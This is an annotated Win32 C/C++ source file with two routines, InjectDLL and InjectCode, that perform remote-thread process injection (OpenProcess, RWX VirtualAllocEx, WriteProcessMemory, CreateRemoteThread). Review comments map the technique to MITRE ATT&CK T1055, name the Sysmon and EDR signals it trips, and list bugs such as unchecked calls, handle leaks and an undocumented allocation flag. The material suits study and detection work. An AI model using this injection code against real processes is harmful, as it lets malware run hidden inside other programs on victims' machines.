// Classic Win32 process injection via a remote thread (MITRE ATT&CK T1055 /
// T1055.001 for the DLL variant). Both routines below follow the same
// sequence — OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
// WriteProcessMemory -> CreateRemoteThread — which is the textbook pattern
// that EDR hooks and Sysmon (Event ID 8, CreateRemoteThread) are built to
// flag. Nothing here checks a single return value, so failures are silent.

// Loads the DLL at `Path` into process `PID` by making the target call
// LoadLibraryA on a copy of the path string.
//   PID  - target process id (must be openable with PROCESS_ALL_ACCESS)
//   Path - NUL-terminated ANSI path of the DLL; copied including the terminator
// Returns nothing and reports nothing: OpenProcess, VirtualAllocEx,
// WriteProcessMemory, GetProcAddress and CreateRemoteThread results are all
// used unchecked (a NULL hProcess simply makes every later call fail).
void InjectDLL(DWORD PID,char *Path) {
    DWORD dwSize;
    // Full access to the target; any lesser right set would be enough for
    // allocation + write + thread creation, so PROCESS_ALL_ACCESS is itself
    // a conspicuous request on the defender's side.
    HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,false,PID);
    dwSize=strlen(Path)+1; // +1 so the terminating NUL is copied too
    // NOTE(review): PARITY_SPACE is not a documented VirtualAllocEx allocation
    // type (InjectCode below uses MEM_COMMIT for the same call) — confirm it is
    // defined somewhere in the project. The path string does not need to be
    // executable, yet the region is requested PAGE_EXECUTE_READWRITE; RWX
    // allocations in a foreign process are a standard detection trigger.
    LPVOID lpParamAddress=VirtualAllocEx(hProcess,0,dwSize,PARITY_SPACE,PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProcess,lpParamAddress,(PVOID)Path,dwSize,NULL);
    // Resolves LoadLibraryA in *this* process and passes that address to the
    // target — presumably relying on kernel32.dll sharing the same base in
    // both processes; verify that assumption holds for the intended targets.
    HMODULE hModule=GetModuleHandleA("kernel32.dll");
    LPTHREAD_START_ROUTINE lpStartAddress=(LPTHREAD_START_ROUTINE)GetProcAddress(hModule,"LoadLibraryA");
    // The new thread's start routine is LoadLibraryA and its sole argument is
    // the remote copy of the path, so the DLL is loaded in the target's context.
    HANDLE hThread=CreateRemoteThread(hProcess,NULL,0,lpStartAddress,lpParamAddress,0,NULL);
    // Waits at most one second, then gives up without knowing whether the
    // remote load finished. The remote allocation is never freed, and hProcess
    // is never closed (handle leak on every call).
    WaitForSingleObject(hThread,1000);
    CloseHandle(hThread);
}
另一种是直接注入代码,代码如下:
// Function name: InjectCode
// Purpose: wraps the remote code-injection routine
// Param: process ID
// Param: pointer to the function to inject <function name>
// Param: parameter
// Param: parameter length
//**************************************************************************************
// Copies a fixed 128 bytes starting at `mFunc`, plus a `ParamSize`-byte
// parameter block, into process `dwProcId` and runs the copy as a new thread
// with the remote parameter block as its argument. Blocks until that thread
// exits, then releases the remote memory.
//   dwProcId  - target process id
//   mFunc     - start of the routine to copy; the code assumes the routine
//               fits in 128 bytes and is self-contained (TODO confirm — a
//               longer routine is truncated, a shorter one drags adjacent
//               bytes along)
//   Param     - parameter block to copy into the target
//   ParamSize - size of that block in bytes (also the VirtualAllocEx size)
// No return value; every Win32 call's result is ignored, so a failed
// OpenProcess leads to a chain of failing calls and an INFINITE wait on an
// invalid thread handle.
void InjectCode(DWORD dwProcId,LPVOID mFunc, LPVOID Param, DWORD ParamSize) {
    HANDLE hProcess;      // remote process handle
    LPVOID mFuncAddr;     // address of memory allocated for the function
    LPVOID ParamAddr;     // address of memory allocated for the parameter
    HANDLE hThread;       // thread handle
    DWORD NumberOfByte;   // auxiliary return value: bytes written, then
                          // reused as the lpThreadId out-parameter below
    CString str;          // unused (MFC type; never referenced)
    // Open a handle to the target process
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcId);
    // Allocate memory — both regions are committed RWX in the target, the
    // parameter block needlessly so
    mFuncAddr = VirtualAllocEx(hProcess,NULL,128,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    ParamAddr = VirtualAllocEx(hProcess,NULL,ParamSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
    // Write memory — always 128 bytes of code regardless of the routine's real
    // length; the second call overwrites NumberOfByte from the first
    WriteProcessMemory(hProcess,mFuncAddr,mFunc,128, &NumberOfByte);
    WriteProcessMemory(hProcess,ParamAddr,Param,ParamSize, &NumberOfByte);
    // Create the remote thread at the copied code; &NumberOfByte here receives
    // the new thread id, not a byte count
    hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)mFuncAddr, ParamAddr,0,&NumberOfByte);
    WaitForSingleObject(hThread, INFINITE); // wait for the thread to finish — hangs forever if it never exits
    // Free the allocated memory (dwSize must be 0 for MEM_RELEASE per the
    // VirtualFreeEx contract — confirm these non-zero sizes are intended)
    VirtualFreeEx(hProcess,mFuncAddr,128,MEM_RELEASE);
    VirtualFreeEx(hProcess,ParamAddr,ParamSize,MEM_RELEASE);
    // Close the remote handles
    CloseHandle(hThread);
    CloseHandle(hProcess);
}